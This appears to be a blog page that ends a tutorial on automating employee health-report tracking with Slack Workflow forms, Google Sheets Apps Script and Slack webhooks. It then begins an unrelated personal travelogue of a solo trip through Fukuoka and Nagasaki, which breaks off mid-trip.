“Select a spreadsheet” to choose the Sheet you just created, and “Sheet” to select the newly created “Timestamp” Sheet.
“Choose a column to search” and select “Row”. Define a cell value to find and enter “1”.
“Update these columns” and “Column name” select “Value”. Click “Insert variable” -> “Person who submitted” -> select “Email”.
Click “Save” to complete! Now the timestamp update in the Sheet has been triggered. Next, we will read it out for use.
Go back to the editing page and click “Add Step” again to add a new step. This time, select “Select a spreadsheet row” to read the Timestamp.
The search part is the same as “Update a spreadsheet row”. Click “Save”.
After saving, go back to the step list page. You can drag and drop to change the order by moving the mouse over the steps.
Change the order to “Update a spreadsheet row” -> “Select a spreadsheet row” -> “Add a spreadsheet row”.
This means: Update to trigger the timestamp update -> Read the Timestamp -> Use it when adding a new Row.
Click “Edit” to edit “Add a spreadsheet row”:
Scroll to the bottom and click “Add Column” in the lower left corner, then click “Insert a variable” in the lower right corner. Find the “Timestamp” variable under the “Select a spreadsheet row” step and insert it.
Click “Save” to save the step and return to the list page. Click “Publish Change” in the upper right corner to publish the changes.
Now, test the workflow shortcut again to see if the timestamp is written correctly.
Success!
Similar to the submission receipt in Google Form, the Slack workflow form can also have one.
On the step editing page, we can add another step by clicking “Add Step”.
This time, choose “Send a message”
Select “Send this message to” and choose “Person who submitted form”
Enter the message content in order: for each question, type the question title, then click “Insert a variable” and select “Response to question XXX”. You can also insert the “Timestamp” at the end. After clicking “Save” to save the step, click “Publish Changes”!
Additionally, you can use “Send a message” to send the filled results to a specific Channel or DM.
Success!
The setup of the Slack workflow form is roughly complete. You can freely combine and play with other features.
Next, we need to write an App Script to handle the filled data.
First, select “Tools” -> “Script editor” from the toolbar at the top of Google Sheet.
You can click the top left corner to give the project a name.
Now we can start writing Apps Script! Apps Script is based on JavaScript, so you can write plain JavaScript code and use Google Sheets’ built-in services directly.
function formatData() {
  var bufferSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Responses'); // Name of the Sheet storing responses

  var rows = bufferSheet.getDataRange().getValues();
  var fields = [];
  var startDeleteIndex = -1;
  var deleteLength = 0;
  for (index in rows) {
    if (index == 0) {
      fields = rows[index];
      continue;
    }

    var sheetName = rows[index][0].toLocaleDateString("en-US"); // Convert Date to String, using US date format MM/DD/YYYY
    var sheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName(sheetName); // Get the MM/DD/YYYY Sheet
    if (sheet == null) { // If it does not exist, create it
      sheet = SpreadsheetApp.getActiveSpreadsheet().insertSheet(sheetName, bufferSheet.getIndex());
      sheet.appendRow(fields);
    }

    sheet.appendRow(rows[index]); // Add the data to the date Sheet
    if (startDeleteIndex == -1) {
      startDeleteIndex = +index + 1;
    }
    deleteLength += 1;
  }

  if (deleteLength > 0) {
    bufferSheet.deleteRows(startDeleteIndex, deleteLength); // After moving to the date Sheets, remove the data from Responses
  }
}
Paste the above code into the Code block and press “control” + “s” to save.
Next, we need to add a trigger button in the Sheet (can only be triggered manually, cannot be automatically triggered when data is written)
Use this interface to draw a button.
After “Save and Close”, you can adjust and move the button; click the top right “…” and select “Assign script”.
Enter the function name “formatData”.
You can click the added button to test the function.
If “Authorization Required” appears, click “Continue” to complete the verification.
During the authentication process, “Google hasn’t verified this app” will appear. This is normal because the App Script we wrote is not verified by Google, but that’s okay since it’s for personal use.
Click “Advanced” at the bottom left -> “Go to Health Report (Responses) (unsafe)”.
Click “Allow”.
While the App Script is running and shows “Running Script”, please do not press again to avoid repeated execution.
Only after the execution is successful can you run it again.
Success! The data is grouped by date.
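A small aside that is not in the original article: instead of (or in addition to) a drawn button, the same function could be exposed through a custom menu using Apps Script's onOpen trigger; the menu and item names here are arbitrary.

function onOpen() {
  // Adds a custom menu to the spreadsheet so formatData can be run without a drawn button.
  SpreadsheetApp.getUi()
    .createMenu('Health Report Tools') // arbitrary menu name
    .addItem('Organize Filled Data', 'formatData')
    .addToUi();
}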
Let’s add a piece of code:
// Compare the employee list Sheet & today's filled Sheet to generate the unfilled list
function generateUnfilledList() {
  var listSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Employee List'); // Employee list Sheet name
  var unfilledListSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Unfilled List'); // Unfilled list Sheet name
  var today = new Date();
  var todayName = today.toLocaleDateString("en-US");

  var todayListSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName(todayName); // Get today's MM/DD/YYYY Sheet
  if (todayListSheet == null) {
    SpreadsheetApp.getUi().alert('Cannot find today\'s Sheet ' + todayName + ' or please run "Organize Filled Data" first');
    return;
  }

  var todayEmails = todayListSheet.getDataRange().getValues().map( x => x[1] ); // Get today's Sheet Email Address column data list
  // index starts from 0, so 1 = Column B
  // output: Email Address,zhgchgli@gmail.com,alan@gamil.com,b@gmail.com...
  todayEmails.shift(); // Remove the first entry, the column name "Email Address", which is meaningless here
  // output: zhgchgli@gmail.com,alan@gamil.com,b@gmail.com...

  unfilledListSheet.clear(); // Clear the unfilled list... prepare to refill the data
  unfilledListSheet.appendRow([todayName + " Unfilled List"]); // The first row shows the Sheet title

  var rows = listSheet.getDataRange().getValues(); // Read the employee list Sheet
  for (index in rows) {
    if (index == 0) { // The first row is the header row; keep it so the generated data also has a header row
      unfilledListSheet.appendRow(rows[index]);
      continue;
    }

    if (todayEmails.includes(rows[index][3])) { // If today's Sheet contains this employee's Email, they have filled it in, so skip... (3 = Column D)
      continue;
    }

    unfilledListSheet.appendRow(rows[index]); // Write a row of data to the unfilled list Sheet
  }
}
After pasting and saving the code, follow the same method as before to add a button and assign the script “generateUnfilledList”.
Once completed, you can click to test:
Unfilled list generated successfully! If no content appears, please make sure everyone filled out the form with their company email and that the emails in the Employee List sheet match.
First, we need to add the Incoming WebHooks App to the Slack Channel. We will use this medium to send messages.
Select the Channel where you want to send the unfilled message.
Note down the “Webhook URL” at the top.
Scroll down to set the name and avatar of the Bot when sending messages; remember to click “Save Settings” after making changes.
Back to our Google Sheet Script
Add another piece of code:
function postSlack() {
  var ui = SpreadsheetApp.getUi();
  var result = ui.alert(
    'Are you sure you want to send the message?',
    'Send unfilled reminder message to Slack Channel',
    ui.ButtonSet.YES_NO);
  // To avoid accidental clicks, ask for confirmation first

  if (result == ui.Button.YES) {
    var unfilledListSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Unfilled List'); // Unfilled List Sheet name
    var rows = unfilledListSheet.getDataRange().getValues();
    var persons = [];
    for (index in rows) {
      if (index == 0 || index == 1) { // Skip the title and column header rows
        continue;
      }

      var person = (rows[index][4] == "") ? (rows[index][2]) : ("<@"+rows[index][4]+">"); // Mention target: use the Slack UID if available, otherwise just display the nickname; 2 = Column C / 4 = Column E
      if (person == "") { // Treat it as abnormal data if both are empty, ignore
        continue;
      }
      persons.push("• "+person+'\n'); // Store the target in the array
    }

    if (persons.length <= 0) { // If no one needs to be notified, everyone has filled it in, cancel sending the message
      return;
    }

    var preText = "*[Health Report Announcement:loudspeaker:]*\nThe company cares about everyone's health, please remember to fill in the daily health status report, thank you:wink:\n\nToday's unfilled health status report list\n\n"; // Message opening content...
    var postText = "\n\nFilling in the health status report allows the company to understand the health status of teammates, please make sure to fill it in every day>< Thank you everyone:woman-bowing::skin-tone-2:"; // Message closing content...
    var payload = {
      "text": preText+persons.join('')+postText,
      "attachments": [{
        "fallback": "You can put the Google Form filling link here",
        "actions": [
          {
            "name": "form_link",
            "text": "Go to Health Status Report",
            "type": "button",
            "style": "primary",
            "url": "You can put the Google Form filling link here"
          }
        ],
        "footer": ":rocket:Tip: Click the \":zap:️lightning\" below the input box -> \"Shortcut Name\" to fill in directly."
      }
      ]
    };
    var res = UrlFetchApp.fetch('Enter your slack incoming app Webhook URL here',{
      method : 'post',
      contentType : 'application/json',
      payload : JSON.stringify(payload)
    });
  }
}
After pasting and saving the code, follow the same method as before to add a button and assign the script “postSlack”.
Once completed, you can click to test:
Success!!! (The @U123456 mention did not actually tag anyone because I typed a random ID.)
At this point, the main functions are all completed!
Note
Please note that the official recommendation is to use the new Slack APP API’s chat.postMessage to send messages. The simpler method of Incoming Webhook will be deprecated. I did not use it here for convenience. You can adjust to the new method along with the next chapter “Import Employee List,” which will require the Slack App API.
Here we need to create a Slack APP.
Click “Create New App” in the upper right corner
Add the following items in “Add an OAuth Scope”:
*If Scopes are added, you need to come back and reinstall.
After installation, get and copy the Bot User OAuth Token
Use the web version of Slack to open the Channel where you want to import the list
Get the URL from the browser:
https://app.slack.com/client/TXXXX/CXXXX
where CXXXX is the Channel ID of this channel; note down this information.
Go back to our Google Sheet Script
Add the following code:
function loadEmployeeList() {
  var formData = {
    'token': 'Bot User OAuth Token',
    'channel': 'Channel ID',
    'limit': 500
  };
  var options = {
    'method' : 'post',
    'payload' : formData
  };
  var response = UrlFetchApp.fetch('https://slack.com/api/conversations.members', options);
  var data = JSON.parse(response.getContentText());
  for (index in data["members"]) {
    var uid = data["members"][index];
    var formData = {
      'token': 'Bot User OAuth Token',
      'user': uid
    };
    var options = {
      'method' : 'post',
      'payload' : formData
    };
    var response = UrlFetchApp.fetch('https://slack.com/api/users.info', options);
    var user = JSON.parse(response.getContentText());

    var email = user["user"]["profile"]["email"];
    var real_name = user["user"]["profile"]["real_name_normalized"];
    var title = user["user"]["profile"]["title"];
    var row = [title, real_name, real_name, email, uid]; // Fill in according to the Employee List columns

    var listSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Employee List'); // Employee list Sheet name
    listSheet.appendRow(row);
  }
}
But this time we don’t need to add the button again, because the import is only needed the first time; so just save and run directly.
First, press “control” + “s” to save, change the top dropdown menu to “loadEmployeeList”, and click “Run” to start importing the list into the Employee List Sheet.
If new employees join later, you can directly add a row in the Employee List Sheet and fill in the information. The Slack UID can be directly queried on Slack:
Click on the person whose UID you want to view, and click “View full profile”
Click “More” and select “Copy member ID” to get the UID (in the form UXXXXX).
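Alternatively, if you would rather not copy member IDs by hand, Slack's users.lookupByEmail API can resolve a UID from a company email. This is a sketch outside the original steps; it reuses the same Bot User OAuth Token and additionally requires the users:read.email scope.

function lookupSlackUidByEmail(email) {
  // Resolve a Slack user ID from an email address (requires the users:read.email scope).
  var options = {
    'method': 'post',
    'payload': {
      'token': 'Bot User OAuth Token', // same token as in loadEmployeeList
      'email': email
    }
  };
  var response = UrlFetchApp.fetch('https://slack.com/api/users.lookupByEmail', options);
  var data = JSON.parse(response.getContentText());
  return data['ok'] ? data['user']['id'] : ''; // e.g. "UXXXXX", or empty if not found
}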
All the above steps are completed, and you can start automating the tracking of employees’ health status.
The completed file can be copied and modified from the following Google Sheet:
If you want to prevent accidental re-execution during execution, you can add at the beginning of the function:
if (PropertiesService.getScriptProperties().getProperty('FUNCTIONNAME') == 'true') {
  SpreadsheetApp.getUi().alert('Busy... Please try again later');
  return;
}
PropertiesService.getScriptProperties().setProperty('FUNCTIONNAME', 'true');
Add at the end of the function execution:
PropertiesService.getScriptProperties().setProperty('FUNCTIONNAME', 'false');
Replace FUNCTIONNAME with the target function name.
This uses a script property as a simple flag to prevent the function from running twice at the same time.
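To make that concrete, here is a minimal sketch of how the flag could wrap one of the functions above; the FORMATDATA key and wrapper name are illustrative only, and Apps Script's built-in LockService would be an equally valid alternative.

function formatDataWithLock() {
  var props = PropertiesService.getScriptProperties();
  if (props.getProperty('FORMATDATA') == 'true') {
    SpreadsheetApp.getUi().alert('Busy... Please try again later');
    return;
  }
  props.setProperty('FORMATDATA', 'true'); // take the flag before doing the work
  try {
    formatData(); // the actual work defined earlier
  } finally {
    props.setProperty('FORMATDATA', 'false'); // release the flag even if formatData throws
  }
}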
This setup can also be connected to CI/CD, wrapping otherwise unfriendly command-line operations in a GUI. For example, with the Slack Bitrise app installed, a Slack Workflow form can be used to trigger build commands: after submission, the workflow sends a command message to the private channel that has the Bitrise app, e.g.:
bitrise workflow:app_store|branch:develop|ENV[version]:4.32.0
This will trigger Bitrise to execute the CI/CD Flow.
If you have any questions or feedback, feel free to contact me.
If you have any automation-related optimization needs, you are also welcome to commission me. Thank you.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Record of a 10-day solo trip to Fukuoka, Nagasaki, and Kumamoto in Kyushu
At the end of August, I officially left Pinkoi after nearly 3 years. I had been contemplating leaving for a while, and earlier in the year, I decided to take a break from work, explore outside, and reassess the situation upon my return. So, I embarked on trips with friends to “[Travelogue] 2023 Kansai & 🇯🇵 First Landing” and with colleagues to “[Travelogue] 2023 Tokyo & 🇯🇵 Second Landing.” However, upon returning, I felt a stronger urge to break free, coinciding with the completion of my tasks. I gathered my courage to step out of my comfort zone, seeking the next challenge!
The “[Travelogue] Flash Visit to Nagoya on 9/11” was purely accidental and felt more like a march than a relaxing trip.
Taking advantage of a rare opportunity, I decided to explore Japan once again. The original plan was to travel with a friend who was also on a break to 🇰🇷 Busan ➡️ 🇯🇵 Fukuoka ➡️ 🇯🇵 Kumamoto; traveling from Korea to Kumamoto, with a stop in Fukuoka where we could board the New Camellia cruise ship, arriving in Fukuoka after a 12-hour overnight journey, covering both commuting and accommodation.
However, my friend found a job in September and I couldn’t find a new travel companion at the moment. Not keen on extensive travel alone, I decided to forgo the 🇰🇷 Busan ➡️ 🇯🇵 Fukuoka segment and instead opted for the 🇯🇵 Fukuoka ➡️ 🇯🇵 Kumamoto route.
With a scattered schedule starting in October and plans to begin job hunting, I scheduled my departure at the end of September (9/17–9/26).
I’ll start with the summary and reflection. I came across a quote in a travel group that resonated with me: “Traveling is a continuous payment of tuition (time or money) for learning. The more experience you gain, the fewer pitfalls you’ll encounter.”
👍
👎
[Japan JR PASS | Kyushu Area Railway Pass | North Kyushu & South Kyushu & All Kyushu | E-Ticket](https://www.kkday.com/en/product/3494-jr-kyushu-rail-pass?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
[Nagasaki, Japan | Huis Ten Bosch Ticket](https://www.kkday.com/en/product/3988-japan-nagasaki-huis-ten-bosch-ticket?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
[Nagasaki Day Tour | Glover Garden, Oura Tenshudo Church & Nagasaki Atomic Bomb Museum, Peace Park & Inasayama Night View (One of the Three Best Night Views in the World/Including Round-Trip Cable Car) | Optional Huis Ten Bosch Fireworks Package | Departing from Fukuoka/Chinese Group](https://www.kkday.com/en/product/152195-nagasaki-tour-saga-yutoku-inari-shrine-fukuoka-japan?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
Initially I considered flying in and out of Fukuoka and making just a one- or two-day round trip to Kumamoto (which later proved to be the right call XD; there aren’t many attractions in Kumamoto, so you don’t need to stay long), but then found that China Airlines had a Fukuoka-in, Kumamoto-out flight option for only $1,000, so I decided to take that flight.
Because there was plenty of time, I chose the most luxurious option, departing at noon and returning at noon, totaling 10 days including the flight time.
Price: $10,048
Due to the vast area of Kyushu, this time I bought the JR Pass Kyushu Rail Pass (5 days), thinking it would be worth it no matter how much I travel.
When arranging, without much consideration or research, I thought I hadn’t been to Fukuoka or Kumamoto; so I decided to split the stay into 5 days in Fukuoka and 4 days in Kumamoto.
Fukuoka 5 nights - Fukuoka Tenjin Benikea Carlton Hotel (Benikea Calton Hotel Fukuoka Tenjin)
Kumamoto 4 nights - Green Rich Hotel Suizenji (Green Rich Hotel Suizenji)
JR Kumamoto -> Hotel
Hotel -> Kumamoto Airport
Accommodation in Kumamoto is hard to find (maybe because rooms are all booked by TSMC business travelers), with limited choices, higher prices than Fukuoka, and older facilities; I finally found this relatively cheap hotel.
Once the hotel is booked, you can proceed to fill out the online immigration application.
Original plan:
This trip was also very impulsive, bought the plane tickets and booked the accommodation on 9/10, planned the itinerary on 9/15, and departed on 9/17!
The flight at 16:40 in the afternoon, plenty of time to wake up slowly and head out leisurely.
Arrived at Taipei Main Station’s A1 Airport MRT station and, as usual, opted for in-town check-in, completing check-in and baggage drop right at the station so that on arrival at the airport I could head straight in without queuing at the counter (for in-town check-in details, please refer to the official website).
This time also used Airtag to track the luggage, no worries about lost luggage, and very convenient while waiting for the baggage carousel.
Around 13:00 arrived at the airport, wandered around after exiting.
Had an expensive and mediocre chicken dish, checked the luggage location casually; the luggage also made it to the airport with me.
After eating, it was only around 14:30, bought a Japanese book on a whim.
Another plane took the wrong runway and the entire airport had to reset; our plane taxied a big loop before taking off and was delayed by about 30 minutes. The seat-back TV on the old aircraft was very small.
China Airlines collaborated with Wutong No. 5 on the cutest in-flight desserts, featuring Dinotaeng’s adorable quokka character, and the osmanthus oolong tea was quite tasty.
Due to a flight delay, I only left the airport around 9:00 PM.
After leaving the airport, you can see a sign indicating the direction to go and where to wait for the bus stop; besides going to Hakata, you can also go to other places, refer to this article or the official website; if you are going to a distant place, make sure to check the schedule.
Originally I planned to take the direct bus to Hakata Station, but the next bus was still nearly an hour away (or something like that, I forget), so I took the No. 1 bus to the domestic terminal (Fukuoka Airport subway station) instead, took the subway to Hakata, transferred to the Nanakuma Line, and got off at Watanabe-dori Station.
The hotel to check in is on the left side of the second photo.
Hotel room tour, overall a bit old, dim lighting, average soundproofing, and the air conditioning makes a slight noise, but still clean and tidy; however, I kind of regret not spending a little more to stay at the APA chain hotel nearby.
Originally planned to visit the food stalls on the first night, but due to fatigue, I just grabbed something from the convenience store and rested early to prepare for the next day’s itinerary.
View of Fukuoka city from outside the bed in the early morning.
Taking the subway to Hakata is a bit roundabout, it’s faster to walk directly to Watanabe-dori and take a bus to Hakata.
Upon arrival in Hakata, go to the manned counter to exchange for the JR Pass (present your passport) and reserve a seat for the trip to Nagasaki. There are many foreigners exchanging for the JR Pass, so I waited for almost an hour before my turn. It is recommended to leave early or go to exchange in advance.
I bought a 5-day pass, which starts counting from the day of exchange. Use the pass with the date and amount for entering and exiting the station; the reserved seat ticket is just to know where your seat is and cannot be used to enter and exit the station. Keep the pass safe as you will need it for the next five days; if lost, it cannot be replaced!
The trip from Hakata to Nagasaki has two segments: first to Takeo Onsen, then a transfer to the Nagasaki train at Takeo Onsen. The transfer is on the same platform and the timetables are well coordinated, so after arriving you basically just walk to the opposite side and board.
When waiting for the train, I found that the trains in Kyushu are very distinctive!!
The seats are large and comfortable, and you can enjoy the scenery by the window.
Travel time: about 1 hour 50 minutes
Side note: Completed a citizen diplomacy mission ✅
When I was on the train, there was a family sitting next to me. The parents took their two children out to play, and one of the children suddenly vomited halfway through the journey. The father didn’t have tissues at hand, so he used a newspaper to wipe it. I handed him some tissues and wet wipes.
When it was time to get off the train, the father gave me a souvenir from Miyauchi City (shrimp rice crackers).
After exiting Nagasaki Station, the weather was great! I was worried it might rain today.
After leaving the station, head towards the Nagasaki streetcar direction.
First, head south to Nagasaki Shinchi Chinatown.
It may be a special spot for foreigners, but for ethnically Chinese visitors it’s just okay. They sell Nagasaki specialties like braised pork buns (kakuni manju, similar to Taiwanese gua bao), sara udon, champon noodles, xiaolongbao… but I wasn’t very hungry at the time, so I just passed by.
On the way to Glover Garden, I also passed by the Confucius Temple XD
Passing through the Dutch Slope (just a slope), then taking the escalator up to Glover Garden Entrance 2, the whole terrain is a large hill facing the sea.
Enter Glover Garden and admire the architecture style and interior decorations; it’s very similar to Fort San Domingo in Tamsui (because both were built by the Dutch).
Don’t forget to exchange for a free photo, where you can also overlook the cruise ships at Nagasaki Port.
On the way down the mountain, you will pass by the Oura Catholic Church, I didn’t go in, just took a photo and left.
Bought a Nagasaki braised pork bun (kakuni manju) to try, but I still think the Taiwanese gua bao tastes better!
On the way back north to the Nagasaki Atomic Bomb Museum, stop by Meganebashi Bridge to take photos. The reflection in the water from the front view is really beautiful, worth a shot if you have time.
Visiting the Atomic Bomb Museum is more about immersion and reflection. The museum has designed many scenes (from the time of the explosion or immersive experiences), installation art, historical data, interviews; allowing visitors to immerse themselves in the historical atmosphere and reflect on the cruelty and horror of future wars.
After leaving the Atomic Bomb Explosion Point, you will arrive at Peace Park.
Colorful paper cranes are hung along the road (including the Atomic Bomb Museum) as a symbol of praying for peace.
After leaving Peace Park, take a break at Dejima before heading to see Mount Inasa Night View, one of the world’s three major night views.
To get to Mount Inasa, walk a short distance from Dejima to the bus stop for the Inasa Ropeway (Fuchi Shrine Station). Then stroll to the station and wait for the cable car.
Unfortunately, the bus was delayed, and there was no electronic sign at the small station. After waiting for more than 5 minutes and thinking the bus might not be running that day, I quickly checked other nearby bus stops that go to Fuchi Shrine. I walked another 10 minutes to another bus stop to catch a different bus.
Funny thing is, halfway there, I saw the delayed bus coming… but it was too late Orz
Across from where I got off the bus is Fuchi Shrine. I walked up and passed through a kindergarten to reach the Nagasaki Ropeway (Fuchi Shrine Station). Since I didn’t plan to stay too late, I bought a round-trip ticket directly (cheaper, but if you stay too late, there might not be a cable car available, and you’ll have to take the bus back).
After getting off the cable car, there is another cable car for mountain viewing, but I didn’t try it. So, I walked straight towards the observation deck.
I forgot to take a photo of the observation deck, which is a 360-degree tower where you can see the entire Nagasaki city, harbor, and mountains without needing a ticket. You can start by watching the sunset from the west as the sun sets over the harbor and continue to enjoy the night view of the city from the east.
The observation deck is spacious and can accommodate many people.
After sunset, you can enjoy the beautiful night view of the entire Nagasaki city and the station.
Finally, take a last look at the night view of Nagasaki Station, buy a Nagasaki cake souvenir (later found out they are also sold in Hakata, with a shelf life of about 12 days, so it’s better to buy them later…), and get ready to return to Hakata.
_If you don’t want to visit all these places on your own, you can refer to KKday’s [**Nagasaki Day Tour Glover Garden · Oura Cathedral & Nagasaki Atomic Bomb Museum · Peace Park & Mount Inasa Night View (One of the World’s Three Major Night Views/Including Round-trip Cable Car) Optional Huis Ten Bosch Fireworks Plan Departing from Fukuoka/Chinese Tour**](https://www.kkday.com/zh-tw/product/152195-nagasaki-tour-saga-yutoku-inari-shrine-fukuoka-japan?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}_
Encountered another delay, this time a JR signal failure; we arrived at Hakata almost an hour late (I was already tired), and the driver drove fast so the ride felt shaky.
Bought a late-night snack and returned to the hotel to rest.
In the morning, first visit the Fukuoka (Tenjin) Tourist Information Center to buy a one-day pass (Fukuoka Tenjin, Hakata, or online ticket purchase available), you can calculate if it’s cheaper.
KKday Kyushu Ticket Dazaifu Yufuin Tour Package (Taoyuan Airport Pickup)
Nishitetsu - A day trip to the ancient city of Dazaifu and the water town of Yufuin.
Additionally, you will receive two coupon books; the Dazaifu one includes a voucher for a free umegae mochi (plum branch cake).
The order isn’t fixed, but the boat tour has a time limit (it stops running after 2 pm), so it’s easiest to follow the itinerary Fukuoka -> Yanagawa -> Dazaifu -> Fukuoka.
After buying the tickets, go to the manned window, show the ticket to the station staff, and you can board the train directly (no need to reserve seats) to Yanagawa.
Travel time: about 1 hour 10 minutes
After exiting the station, you will see staff wearing white vests (if there is no service center nearby, you can ask), they will provide you with a map + return route + timetable and guide you to take the shuttle bus to the boarding point.
When exiting the station, go to the manned ticket gate; the staff will tear off the Fukuoka-to-Yanagawa portion of the ticket. I had originally thought of walking the distance, but on seeing the staff so attentively directing people to the shuttle, I took the bus, which turned out to be the right call.
Arrived at the boarding point and waited for the next boat. I happened to be behind a Taiwanese family, joined their boat on the spot, and chatted with them along the way (after all, I was traveling alone and don’t speak Japanese, so I had hardly talked to anyone in Kyushu).
The water is very clean, this season’s lush green is not as beautiful, but relatively fewer people.
The boatman will introduce the passing sights along the way, and sing songs (most Taiwanese would have heard, many old songs).
When crossing the bridge, the boatman will ask everyone to bow their heads to avoid hitting, quite interesting; there is not much shade on the way, a bit sunny.
You will pass by an ice shop on the way, selling fruit ice, you can buy one to cool off; the boatman will also give each person an ice pack to cool down (very thoughtful).
I chatted with the Taiwanese family’s father who was in front of me all the way, and in the end, I even got a business card.
After getting off the boat, I couldn’t find the free shuttle, queued in the wrong line, and was refused boarding (that shuttle wasn’t for the Nishitetsu pass); you need to study the boarding point on the map (Chuanliu Shipyard (Chongzhinan)) or just ask someone directly, which is faster.
I later walked to a bus stop and took a bus back to Nishitetsu Yanagawa Station.
From Yanagawa to Dazaifu, you need to change at Futsukaichi Station (on another platform) to the train bound for Dazaifu.
Travel time: about 1 hour
Take the Tabito-go train to Dazaifu, via Gojo (2.5 Go QQ); it’s a bit like going from Beitou to Xinbeitou, just one train back and forth.
There is a section in the middle of the train that displays artifacts from Dazaifu and you can write postcards, you can go take a look.
Dazaifu Station is also beautiful, and the Lawson outside has a very Japanese vibe.
On the right side of the exit is the world’s only Ichiran Ramen served in a pentagonal bowl (a Japanese pun on 合格, “passing the exam”).
After the ramen, try an umegae mochi (plum branch cake); it’s not really plum-flavored, more like a grilled rice cake with red bean filling, and it tastes best when the skin is freshly made!
I forgot to redeem the free voucher that came with the Nishitetsu pass and spent 150 yen to buy one myself; since it only keeps for about a day, I couldn’t bring any back to Taiwan.
Continue along Omotesando towards Dazaifu and you will pass by one of the most beautiful Starbucks in Japan, the space is quite large but crowded, so I left without stopping.
The bridge leading to the shrine should be quite nice to take photos at night + fewer people, too many people make it difficult to take good photos.
After visiting, return to Dazaifu Station and head back to Fukuoka Lalaport.
Similarly, head back from Dazaifu Station to Futsukaichi and transfer to the train back toward the city. Get off at Ōhashi (Fukuoka), turn left after exiting the station to find the direct bus to Lalaport, hop on, and you will arrive at Fukuoka Lalaport after one stop.
Total travel time: about 50 minutes
Upon arrival, you will see the huge Fukuoka Gundam outside.
Lalaport is large, great for shopping, and suitable for families. There is a large playground upstairs where children play and people rest.
Upstairs, there is a Jump Shop selling merchandise related to Shonen Jump Weekly, including Haikyuu!!, One Piece, Hunter x Hunter, Jujutsu Kaisen, Chainsaw Man, and more. I bought some Jujutsu Kaisen merchandise.
If you spend over 5000 Japanese Yen, you can get a tax refund, but it seems to be refunded through their app or something, a bit complicated, and food is not included.
Go to the food street and have a Miyazaki beef bowl. Before leaving, I bought some snacks to take back (curry bread, like Mizuhoan daifuku).
The Gundam that lights up at night is quite impressive.
For the return direct bus, do not take it from where you originally got off. Follow the signs inside the building and take the bus directly from the bus stop inside the building.
Return to the hotel to rest, using a tablet (the TV is too old and lacks smart functions). The curry bread is crispy and delicious, with meat filling inside, and the daifuku is good too, but I prefer Benzaiten.
In the early morning, head to Hakata Station again, take the JR to Moji Port, and then return to Kokura Castle.
[_KKday Itinerary Reference: Japan Fukuoka Kitakyushu One-Day Charter Tour Dazaifu Tenmangu Shrine, Moji Port, Karato Market, Kanmon Strait, Akama Shrine_](https://www.kkday.com/zh-tw/product/157874?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
Arrived at Moji Port without any surprises or dangers (worried about being fined).
Walking out of the station is Moji Port, usually deserted; happened to catch the Blue Wing Moji Suspension Bridge being lowered.
After it’s lowered, you can walk to the observation tower at the back and overlook the entire Moji Port.
Coming out of the tower, you can take a walk around Moji Port.
For lunch, try the famous curry in Moji Port.
Moji is very close to Kokura, but Kokura is a small station and quite desolate when you exit; I got lost looking for the entrance to Kokura Castle and circled a big loop, when in fact the entrance is beside the mall outside the station.
Kokura Castle itself is small but has quite a few things to see inside; it’s just that the view from the main keep is rather ordinary (you mostly see the mall in front).
After the visit, I returned to the station and dutifully took the JR back to Hakata; since it’s a small station, only local trains stop there, so the ride back slowly took more than an hour.
Returning to Hakata with time to spare, went to Canal City Hakata and wandered around the city center.
I hadn’t looked it up beforehand and thought it was some kind of actual “canal” or “castle”; it turns out to be a shopping mall XD, though it really does have a canal with fountain shows.
There are plenty of places to shop around here, including a Jump Shop.
Still early, wandered around and ended up eating Hakata Gion Teppan Gyoza.
The skin is crispy with soup inside, very delicious. Due to the language barrier, the waitress cutely gestured with her hands and belly to suggest ordering 2 portions (one portion is only 8 pieces; you need 16 to be full); I didn’t catch on at the time, so I only ordered one portion plus Hakata’s famous mentaiko.
After eating, I took a stroll through the Nakasu food stalls before it got dark.
It was still early, so I first went to explore the Tenjin Parco department store and planned to come back to see the night view later.
Upstairs, there was Animate, and I got the first draw of the gachapon and got Gojo from Jujutsu Kaisen.
The night view of the Nakasu food stalls gave off a festive atmosphere.
The flashy Japanese advertising signs were eye-catching.
The Nakasu food stalls are roadside eateries on this side, bustling with people; they offer ramen, oden, and grilled food, but nothing particularly caught my attention, so I didn’t go in to eat.
Returned to the hotel to drink and have a late-night snack for rest.
A day of walking in Fukuoka, starting by visiting the nearby Sumiyoshi Shrine after leaving the hotel.
It’s small, so if it’s not nearby, you probably wouldn’t go out of your way to visit.
Passed by Hakata Canal City again on the way to Kushida Shrine.
Saw where the food trucks were parked in the morning, so small and cute.
Kushida Shrine is relatively large, and I also drew a fortune slip. Seeing “suddenly successful in job hunting” gave me hope for my job search.
There were floats displayed for the Hakata Gion Yamakasa Festival, very grand and spectacular.
Continuing the walk in Fukuoka, at noon, walked to Hakata Miyachiku (Japan’s No. 1 Miyazaki Beef Specialty Store Hakata Miyachiku) to taste Miyazaki beef.
This Miyazaki beef steak with beer costs around NT$650, delicious and affordable! The Miyazaki beef was juicy and had no strange smell.
After lunch, I wandered around Tenjin Chikagai (the Tenjin underground shopping street), bought souvenir cookies and cakes, and also went to the supermarket to try the popular seedless muscat grapes on skewers.
While wandering in Tenjin, I encountered the wild Kumamon Chief.
First, return to the hotel to drop off the souvenirs purchased + rest for a while before heading to Fukuoka Tower + watching a baseball game.
Take a bus from the city to Fukuoka Tower.
[_KKday Japan Kyushu Fukuoka Tower E-Ticket_](https://www.kkday.com/zh-tw/product/18813-japan-fukuoka-tower-e-ticket?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
Fukuoka Tower’s full mirror design looks beautiful from the outside, I think it’s even more beautiful than the Tokyo Skytree!
(Thanks to a passerby sister for taking the photo)
However, because the tower is located on the outermost side of the city facing the sea, the view from the top is average; not sure how the night view is.
After leaving Fukuoka Tower, slowly walk to the next stop, Fukuoka PayPay Baseball Stadium, with a taste of the sea.
Many people (probably about 70% full), but tickets are still available on-site.
Ticket Buying Episode
